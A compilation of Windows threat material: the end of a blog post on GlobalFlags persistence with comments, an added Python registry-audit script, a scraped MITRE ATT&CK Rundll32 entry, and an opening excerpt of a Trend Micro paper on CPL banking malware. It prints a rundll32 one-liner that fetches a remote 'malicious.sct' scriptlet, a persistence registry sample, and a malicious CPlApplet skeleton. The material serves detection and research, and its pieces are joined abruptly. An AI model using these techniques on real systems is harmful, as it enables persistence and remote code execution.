After I close notepad, it now looks like this:

I've been asked by some people since my last post why I disclose these things, and my intentions are pure. Many people fear that this is like giving away techniques to the bad guys, but I feel disclosing these things makes it possible to discover them in the wild and create good detection mechanisms and prevention. I have also seen a lot of discussions on Twitter lately about people not wanting to disclose their techniques since it makes their job more difficult (pentesters) and that makes me sad in some way even though I can understand and relate to the reasons. My reasons for sharing things I discover are to make things more secure for everyone and hopefully it will also inspire others to start their own research and disclose new and unknown stuff to the public. Hope you enjoyed the post and as always, feedback is always welcome!

Tagged autoruns, persistence, research, security

4 thoughts on "Persistence using GlobalFlags in Image File Execution Options – Hidden from Autoruns.exe"

Dan says:
11 Apr 2018 at 1:16 pm
Interesting article. There is an additional method for persistence that I haven't seen anyone check for which also requires admin rights. The initial functionality is for process debugging and is enabled in a similar fashion.
It basically allows you to run something prior to the "debugged" process starting, with the purpose of debugging attachment. I remember reading about the functionality at some point in a book and wondering why nobody uses this as a persistence method. I know I tested it and it worked like a charm. I don't remember the details but I do believe it was something similar to: https://support.microsoft.com/en-us/help/824344/how-to-debug-windows-services Section: Configure a service to start with the WinDbg debugger attached, method 2. Cheers!

Oddvar Moe [MVP] says:
11 Apr 2018 at 2:23 pm
I think you are thinking about the debugger that you can set in the registry. This has been known for many years and malware uses it all the time. Even Process Explorer uses this technique if you choose to change it to the default task manager.

Pingback: Week 15 – 2018 – This Week In 4n6

Stratcat says:
27 Dec 2018 at 1:41 pm
This has been around for a long time and any developer worth a damn knows about it. I think you're safe in sharing and linking to the MSDN documents that describe its usage.
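The Microsoft Docs article and the blog post above describe the same registry layout from two sides: GFlags writes FLG_MONITOR_SILENT_PROCESS_EXIT (0x200) into the image's Image File Execution Options key and the monitor settings (ReportingMode, MonitorProcess, DumpType) into SilentProcessExit\<image>, and the Symantec writeup before them shows the older IFEO "Debugger" value being used to neutralise security tools. The script below is an added example, not code from Microsoft, Symantec or the blog author: it audits an offline registry export (for instance the output of `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" cv.reg`, an assumed collection step) and reports every IFEO Debugger value and every silent-exit registration together with the decoded flags, whether a monitor process would actually be launched, and whether that monitor lives in an NTFS alternate data stream. The .reg text embedded in it is constructed; evil.exe, myapp.exe and the stream name are placeholders.

```python
"""Offline audit of an exported registry fragment for Image File Execution Options
(IFEO) Debugger hijacks and SilentProcessExit monitor processes.

Added example; not code from Microsoft, Symantec or Oddvar Moe. The input is the
text written by, for instance (assumed collection step on the examined host):
    reg export "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" cv.reg
The SAMPLE_REG text below is constructed for this example.
"""
import re

# GlobalFlag bit that gflags.exe sets for "Enable Silent Process Exit Monitoring" (0x200 = 512)
FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200
# ReportingMode flags documented for the SilentProcessExit key
REPORTING_MODE = {0x1: "LAUNCH_MONITORPROCESS", 0x2: "LOCAL_DUMP", 0x4: "NOTIFICATION"}
# The two MINIDUMP_TYPE members (dbghelp.h) that make up the documented Micro dump value 0x88
MINIDUMP_TYPE = {0x08: "MiniDumpFilterMemory", 0x80: "MiniDumpFilterModulePaths"}

IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
SPE = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit"

_VALUE = re.compile(r'"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')


def parse_reg(text):
    """Parse the subset of .reg syntax written by `reg export`: [key] headers,
    "name"=dword:xxxxxxxx and "name"="string". Returns {key: {name: value}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE.match(line)
        if m and current is not None:
            name, dword, string = m.groups()
            # .reg files escape backslashes inside string values as \\
            keys[current][name] = int(dword, 16) if dword is not None else string.replace("\\\\", "\\")
    return keys


def decode_bits(value, table):
    """Name the bits of a bitwise-OR value; bits not in the table are reported as a hex remainder."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append("unknown:0x%x" % unknown)
    return names


def is_alternate_stream(path):
    """True for a drive-rooted path whose last component carries an NTFS stream name (dir\\file:stream)."""
    return bool(re.match(r"^[A-Za-z]:\\.*:[^\\]+$", path))


def audit(text):
    """Return one finding per IFEO Debugger value and per image registered for
    silent exit monitoring, joined with its SilentProcessExit\\<image> settings."""
    keys = parse_reg(text)
    by_lower = {k.lower(): v for k, v in keys.items()}
    findings = []
    for key, values in keys.items():
        if not key.lower().startswith(IFEO.lower() + "\\"):
            continue
        image = key[len(IFEO) + 1:]
        if "Debugger" in values:  # the "Debugger = ntsd -d" style entries from the Symantec writeup
            findings.append({"image": image, "kind": "ifeo_debugger", "command": values["Debugger"]})
        if values.get("GlobalFlag", 0) & FLG_MONITOR_SILENT_PROCESS_EXIT:
            spe = by_lower.get((SPE + "\\" + image).lower(), {})
            mode = spe.get("ReportingMode", 0)
            monitor = spe.get("MonitorProcess")
            findings.append({
                "image": image,
                "kind": "silent_exit_monitor",
                "reporting_mode": decode_bits(mode, REPORTING_MODE),
                "monitor_process": monitor,
                "dump_type": decode_bits(spe.get("DumpType", 0), MINIDUMP_TYPE),
                # a monitor process is only launched when LAUNCH_MONITORPROCESS is set
                "launches_process": bool(mode & 0x1 and monitor),
                "ads_monitor": bool(monitor and is_alternate_stream(monitor)),
            })
    return findings


# Constructed sample export: one silent-exit monitor launched from an alternate data
# stream, one IFEO Debugger hijack, and one dump-only registration with no monitor process.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="c:\\windows\\tasks:evil.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]
"Debugger"="ntsd -d"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\myapp.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\myapp.exe]
"ReportingMode"=dword:00000002
"DumpType"=dword:00000088
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_REG):
        print(finding)
```

Because the flag bits are decoded rather than compared against a fixed value, a registration whose ReportingMode is LOCAL_DUMP only (a developer collecting crash dumps) is reported as not launching anything, while a GlobalFlag of 0x200 with LAUNCH_MONITORPROCESS set and a MonitorProcess outside the usual debugger locations is the combination the blog post plants. The same parser also surfaces every IFEO Debugger value, which is the list the Symantec removal steps walk through by hand.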
-"Rundll32 - Enterprise | MITRE ATT&CK\xe2\x84\xa2 Matrices Tactics PRE-ATT&CK Enterprise Mobile Techniques PRE-ATT&CK Enterprise Mobile Mitigations Enterprise Mobile Groups Software Resources General Information Getting Started ATT&CKcon Working with ATT&CK FAQ Updates Previous Versions Related Projects Blog\xc2 Contribute Register to stream ATT&CKcon 2.0 October 29-30 ENTERPRISE ENTERPRISE MOBILE PRE-ATT&CK TECHNIQUES All Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Replication Through Removable Media Spearphishing Attachment Spearphishing Link Spearphishing via Service Supply Chain Compromise Trusted Relationship Valid Accounts Execution AppleScript CMSTP Command-Line Interface Compiled HTML File Control Panel Items Dynamic Data Exchange Execution through API Execution through Module Load Exploitation for Client Execution Graphical User Interface InstallUtil Launchctl Local Job Scheduling LSASS Driver Mshta PowerShell Regsvcs/Regasm Regsvr32 Rundll32 Scheduled Task Scripting Service Execution Signed Binary Proxy Execution Signed Script Proxy Execution Source Space after Filename Third-party Software Trap Trusted Developer Utilities User Execution Windows Management Instrumentation Windows Remote Management XSL Script Processing Persistence .bash_profile and .bashrc Accessibility Features Account Manipulation AppCert DLLs AppInit DLLs Application Shimming Authentication Package BITS Jobs Bootkit Browser Extensions Change Default File Association Component Firmware Component Object Model Hijacking Create Account DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Hypervisor Image File Execution Options Injection Kernel Modules and Extensions Launch Agent Launch Daemon Launchctl LC_LOAD_DYLIB Addition Local Job Scheduling Login Item Logon Scripts LSASS Driver Modify Existing Service Netsh Helper DLL New Service 
Office Application Startup Path Interception Plist Modification Port Knocking Port Monitors Rc.common Re-opened Applications Redundant Access Registry Run Keys / Startup Folder Scheduled Task Screensaver Security Support Provider Service Registry Permissions Weakness Setuid and Setgid Shortcut Modification SIP and Trust Provider Hijacking Startup Items System Firmware Systemd Service Time Providers Trap Valid Accounts Web Shell Windows Management Instrumentation Event Subscription Winlogon Helper DLL Privilege Escalation Access Token Manipulation Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Bypass User Account Control DLL Search Order Hijacking Dylib Hijacking Exploitation for Privilege Escalation Extra Window Memory Injection File System Permissions Weakness Hooking Image File Execution Options Injection Launch Daemon New Service Path Interception Plist Modification Port Monitors Process Injection Scheduled Task Service Registry Permissions Weakness Setuid and Setgid SID-History Injection Startup Items Sudo Sudo Caching Valid Accounts Web Shell Defense Evasion Access Token Manipulation Binary Padding BITS Jobs Bypass User Account Control Clear Command History CMSTP Code Signing Compile After Delivery Compiled HTML File Component Firmware Component Object Model Hijacking Control Panel Items DCShadow Deobfuscate/Decode Files or Information Disabling Security Tools DLL Search Order Hijacking DLL Side-Loading Execution Guardrails Exploitation for Defense Evasion Extra Window Memory Injection File Deletion File Permissions Modification File System Logical Offsets Gatekeeper Bypass Group Policy Modification Hidden Files and Directories Hidden Users Hidden Window HISTCONTROL Image File Execution Options Injection Indicator Blocking Indicator Removal from Tools Indicator Removal on Host Indirect Command Execution Install Root Certificate InstallUtil Launchctl LC_MAIN Hijacking Masquerading Modify Registry Mshta Network Share Connection Removal 
NTFS File Attributes Obfuscated Files or Information Plist Modification Port Knocking Process Doppelg\xc3\xa4nging Process Hollowing Process Injection Redundant Access Regsvcs/Regasm Regsvr32 Rootkit Rundll32 Scripting Signed Binary Proxy Execution Signed Script Proxy Execution SIP and Trust Provider Hijacking Software Packing Space after Filename Template Injection Timestomp Trusted Developer Utilities Valid Accounts Virtualization/Sandbox Evasion Web Service XSL Script Processing Credential Access Account Manipulation Bash History Brute Force Credential Dumping Credentials in Files Credentials in Registry Exploitation for Credential Access Forced Authentication Hooking Input Capture Input Prompt Kerberoasting Keychain LLMNR/NBT-NS Poisoning and Relay Network Sniffing Password Filter DLL Private Keys Securityd Memory Two-Factor Authentication Interception Discovery Account Discovery Application Window Discovery Browser Bookmark Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Process Discovery Query Registry Remote System Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion Lateral Movement AppleScript Application Deployment Software Distributed Component Object Model Exploitation of Remote Services Logon Scripts Pass the Hash Pass the Ticket Remote Desktop Protocol Remote File Copy Remote Services Replication Through Removable Media Shared Webroot SSH Hijacking Taint Shared Content Third-party Software Windows Admin Shares Windows Remote Management Collection Audio Capture Automated Collection Clipboard Data Data from Information Repositories Data from Local System Data from Network Shared Drive Data from 
Removable Media Data Staged Email Collection Input Capture Man in the Browser Screen Capture Video Capture Command and Control Commonly Used Port Communication Through Removable Media Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Encoding Data Obfuscation Domain Fronting Domain Generation Algorithms Fallback Channels Multi-hop Proxy Multi-Stage Channels Multiband Communication Multilayer Encryption Port Knocking Remote Access Tools Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Standard Non-Application Layer Protocol Uncommonly Used Port Web Service Exfiltration Automated Exfiltration Data Compressed Data Encrypted Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Command and Control Channel Exfiltration Over Other Network Medium Exfiltration Over Physical Medium Scheduled Transfer Impact Data Destruction Data Encrypted for Impact Defacement Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service Firmware Corruption Inhibit System Recovery Network Denial of Service Resource Hijacking Runtime Data Manipulation Service Stop Stored Data Manipulation Transmitted Data Manipulation Home Techniques Enterprise Rundll32 Rundll32 The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations. Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. [1] Rundll32 can also been used to execute scripts such as JavaScript. 
This can be done using a syntax similar to this:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")

This behavior has been seen used by malware such as Poweliks. [2]

ID: T1085
Tactic: Defense Evasion, Execution
Platform: Windows
Permissions Required: User
Data Sources: File monitoring, Process monitoring, Process command-line parameters, Binary file metadata
Defense Bypassed: Anti-virus, Application whitelisting, Digital Certificate Validation
Contributors: Ricardo Dias; Casey Smith
Version: 1.1

Mitigations

Exploit Protection: Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting.

Examples

ADVSTORESHELL: ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence. [23]
APT19: APT19 configured its payload to inject into the rundll32.exe. [34]
APT28: APT28 executed CHOPSTICK by using rundll32 commands such as rundll32.exe "C:\Windows\twain_64.dll". APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload. [35] [23] [36] [37] [38]
APT29: APT29 has used rundll32.exe for execution. [42]
APT3: APT3 has a tool that can run DLLs. [39]
Bisonal: Bisonal uses rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"vert" = "rundll32.exe c:\windows\temp\pvcu.dll , Qszdez". [5]
Briba: Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs. [8]
Carbanak: Carbanak installs VNC server software that executes through rundll32. [41]
Comnie: Comnie uses Rundll32 to load a malicious DLL. [16]
CopyKittens: CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode. [33]
CORESHELL: CORESHELL is installed via execution of rundll32 with an export named "init" or "InitW." [30]
CozyCar: The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component. [28]
DDKONG: DDKONG uses Rundll32 to ensure only a single instance of itself is running at once. [4]
Elise: After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe. [15]
Emissary: Variants of Emissary have used rundll32.exe in Registry values added to establish persistence. [18]
FELIXROOT: FELIXROOT uses Rundll32 for executing the dropper program. [19] [20]
Flame: Rundll32.exe is used as a way of executing Flame at the command-line. [12]
gh0st RAT: A gh0st RAT variant has used rundll32 for execution. [29]
GreyEnergy: GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM). [20]
JHUHUGIT: JHUHUGIT is executed using rundll32.exe. [13] [14]
Koadic: Koadic can use Rundll32 to execute additional payloads. [3]
Kwampirs: Kwampirs uses rundll32.exe in a Registry value added to establish persistence. [27]
Matroyshka: Matroyshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism. [6]
Mosquito: Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability. [26]
MuddyWater: MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll. [40]
NOKKI: NOKKI has used rundll32 for execution. [22]
NotPetya: NotPetya uses rundll32.exe to install itself on remote systems when accessed via PsExec or wmic. [31]
PowerDuke: PowerDuke uses rundll32.exe to load. [21]
Prikormka: Prikormka uses rundll32.exe to load its DLL. [25]
Pteranodon: Pteranodon executes functions using rundll32.exe. [7]
PUNCHBUGGY: PUNCHBUGGY can load a DLL using Rundll32. [9]
RTM: RTM runs its core DLL file using rundll32.exe. [24]
Sakula: Sakula calls cmd.exe to run various DLL files via rundll32. [10]
ServHelper: ServHelper contains a module for downloading and executing DLLs that leverages rundll32.exe. [32]
StreamEx: StreamEx uses rundll32 to call an exported function. [11]
TA505: TA505 has leveraged rundll32.exe to execute malicious DLLs. [43] [32]
Winnti: The Winnti installer loads a DLL using rundll32. [17]

Detection

Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.

References

1. Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.
2. Ancel, B. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.
3. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
4. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
5. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
6. Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.
7. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
8. Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.
9. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
10. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
11. Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV's Radar. Retrieved February 15, 2017.
12. sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.
13. F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016.
14. Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
15. Falcone, R., et al. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.
16. Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.
17. Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.
18. Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve? Retrieved February 15, 2016.
19. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
20. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
21. Adair, S. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
22. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.
23. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
24. Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
25. Cherepanov, A. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016.
26. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
27. Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.
28. F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
29. Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.
30. Anthe, C., et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
31. Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.
32. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.
33. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
34. Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.
35. Alperovitch, D. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
36. Lee, B., Falcone, R. (2018, June 06). Sofacy Group's Parallel Attacks. Retrieved June 18, 2018.
37. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
38. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
39. Chen, X., Scott, M., Caselden, D. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.
40. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
41. Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.
42. Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
43. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.

Copyright © 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation.
CPL Malware: Malicious Control Panel Items
A Trend Micro Research Paper
Fernando Mercês, Forward-Looking Threat Research Team
Trend Micro | CPL Malware

TREND MICRO LEGAL DISCLAIMER

The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice. The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing herein should be construed otherwise. Trend Micro reserves the right to modify the contents of this document at any time without prior notice. Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the translation are not binding and have no legal effect for compliance or enforcement purposes. Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend Micro disclaims all warranties of any kind, express or implied.
Neither Trend Micro nor any party involved in creating, producing, or delivering this document shall be liable for any consequence, loss, or damage, including direct, indirect, special, consequential, loss of business profits, or special damages, whatsoever arising out of access to, use of, or inability to use, or in connection with the use of this document, or any errors or omissions in the content thereof. Use of this information constitutes acceptance for use in an "as is" condition.

Contents

Introduction
Attack Overview
.CPL File Format
    .CPL Launch Process
Analyzing .CPL Files
    Static Analysis
    Dynamic Analysis
How Cybercriminals Use .CPL Files
    Brazil
    Worldwide
Conclusion
Appendix
    OSs That Support .CPL File Execution
    Top 20 Words Associated with CPL Banking Trojans

Introduction

.CPL is an executable file format that cybercriminals use to create malware these days. Nonmalicious .CPL files, of course, exist, but this research paper will focus on malicious ones, which Trend Micro calls "CPL malware." We decided to explore this topic due to the growing number of CPL malware currently being created and distributed, especially in Brazil. These have been primarily targeting online banking customers.

Attack Overview

Brazil is a well-known producer and target of banking Trojans, more popularly known as "bankers" in the country. Based on partner reports, an average of 40 new malware target Brazilian banking customers per day. To evade common detection techniques, cybercriminals seem to follow these steps when launching CPL Trojan attacks:

1. Send a phishing email to potential victims. The emails use the names of popular financial organizations to induce potential victims to click a link to download a payment receipt or see their debt balances.

2. Victims download a .ZIP file by clicking a link embedded in the email. Cybercriminals use shortened links that, when clicked, download a compressed .CPL file onto the victims' computers. And because recent Windows® versions are distributed with native decompression programs, users can easily open the attached file.
The said .ZIP file contains .CPL files with specially chosen names to better fool users into thinking they are legitimate. These names include the following Brazilian and Portuguese words (see the Appendix for a list of the top CPL Trojan-related words):

• Boleto/Fatura: Invoice
• NF-e: Acronym for "electronic receipt," short for "nota fiscal eletronica"
• Nota/Recibo: Printed receipt
• SPC: Organization responsible for protecting companies from defaulters or customers who fail to pay their debts
• Serasa: Organization exclusively responsible for protecting banks from defaulters

Figure 1: Sample malicious .CPL file

Figure 2: .CPL files found in a .ZIP file that Windows natively opens

3. Victims execute the .CPL file. Double-clicking the .CPL file can have several payloads. Most .CPL files drop new banking Trojan variants onto victims' computers, but some also contain malicious code themselves.

Figure 3: How CPL malware works

Figure 4: Phishing email accusing the recipient of being a defaulter with a link that, when clicked, downloads a TROJ_BANLOAD variant [1]

Even though .CPL files are quite common, security analysts and the security industry in general know very little about them. [2] Even Microsoft's official documentation contains only a few pages on the .CPL file format. Most of the technical information in this paper was likely obtained by reverse-engineering .CPL files, Windows loaders, and the like.

[1] Trend Micro Incorporated. (2014). Threat Encyclopedia. "TROJ_BANLOAD." Last accessed January 7, 2014, http://about-threats.trendmicro.com/us/search.aspx?p=TROJ_BANLOAD.
[2] Microsoft. (2014). Windows Dev Center—Desktop. "Implementing Control Panel Items." Last accessed January 17, 2014, http://msdn.microsoft.com/en-us/library/windows/desktop/cc144185%28v=vs.85%29.aspx.

.CPL File Format

.CPL is the file name extension for Control Panel items, the icons that appear in the Windows Control Panel. [3] Each item or icon in the Windows Control Panel is used to configure a system. Windows applications host CPL applets, the miniprograms each Control Panel icon launches. Since Windows 3.x, some .CPL files have been distributed with the OS, although programmers can also create their own .CPL files for use with their programs.

In a nutshell, a .CPL file is a dynamic link library (.DLL) file that: [4]

• Uses .CPL as file name extension instead of .DLL
• Exports a function known as "CPlApplet" [5]
• Hosts one or more CPL applets
• Handles the special messages the CPlApplet caller sends

Double-clicking a .DLL file does not result in anything because regular .DLL files need to be loaded by a program. Double-clicking a .CPL file on Windows, however, automatically loads an application.

.CPL Launch Process

.CPL files can be loaded in Windows via different methods. First, a user can manually call a .CPL file from the command-line interface using the main Control Panel executable file, control.exe, by typing the following:

    control.exe file.cpl,@n,t

In the syntax above, n refers to the applet index inside file.cpl while t refers to the tab index used in multitabbed applets.
If you want to open the second tab of the first applet in main.cpl, the file used to configure mouse properties on Control Panel, you can type the following in the command-line interface:

    control.exe main.cpl,@0,1

[3] Microsoft. (2014). Microsoft Support. "Description of Control Panel (.CPL) Files." Last accessed January 7, 2014, http://support.microsoft.com/kb/149648.
[4] Microsoft. (2014). Microsoft Support. "What Is a DLL?" Last accessed January 7, 2014, https://support.microsoft.com/kb/815065.
[5] Microsoft. (2014). Windows | Dev Center — Desktop. "CPlApplet Entry Point." Last accessed January 7, 2014, http://msdn.microsoft.com/en-us/library/windows/desktop/bb776392(v=vs.85).aspx.

The command above will open the following window:

Figure 5: Applet's second tab opened by control.exe

A user can also load a .CPL file using a VBScript such as the following:

    Dim obj
    Set obj = CreateObject("Shell.Application")
    obj.ControlPanelItem("joy.cpl")

The shell object has a built-in ControlPanelItem method that runs the specified Control Panel (*.cpl) application. If the application is already open, it will activate the running instance instead.

The loading methods discussed above are, however, manual and may not be favored by malware creators. As such, most .CPL files are automatically loaded when double-clicked. Windows has undocumented functions like "Control_RunDLL" and "Control_RunDLLAsUser" in shell32.dll that load .CPL files onto computers.
The following diagram provides more details:

Figure 6: .CPL file loading process in Windows

Double-clicking a .CPL file can also be simulated by issuing the following command:

    rundll32.exe shell32.dll,Control_RunDLL file.cpl

The Control_RunDLL function has the following parameters:

• .CPL file name
• Applet index
• Applet tab index

The structure above was designed with nonmalicious use in mind; CPL malware does not need more than one applet or multitabbed applets to work. Once the application is launched, the malware can then execute the malicious code.

Before the CPL applet at the given index is launched, the CPlApplet function is called. This function has the following prototype:

    LONG CPlApplet(
        HWND hwndCPl,
        UINT uMsg,
        LPARAM lParam1,
        LPARAM lParam2
    );

Note that the uMsg parameter is used to send valid messages like the following to the CPlApplet function, which will subsequently handle them:

• CPL_INIT
• CPL_GETCOUNT
• CPL_INQUIRE
• CPL_SELECT
• CPL_DBLCLK
• CPL_STOP
• CPL_EXIT
• CPL_NEWINQUIRE
• CPL_STARTWPARMS

The first message sent to the CPlApplet function is CPL_INIT. Once it is sent, code inside the .CPL file runs and must return a nonzero value to indicate successful initialization. All malicious code can be found inside the CPlApplet function. The application no longer needs to continue the normal launch process and wait for different messages.
A nonmalicious CPlApplet function such as the following should handle every message:

    int CPlApplet(HWND hwndCPL, UINT message, LPARAM lParam1, LPARAM lParam2)
    {
        switch (message) {
        case CPL_INIT:
            // run code;
            return 1;
        case CPL_GETCOUNT:
            return 3;   // 3 applets
        case CPL_INQUIRE:
            …
        default:
            return 0;
        }
        return 0;
    }

Malicious code, meanwhile, can look like the following:

    int CPlApplet(HWND hwndCPL, UINT message, LPARAM lParam1, LPARAM lParam2)
    {
        // run malware code or drop another malware
        return 1;
    }

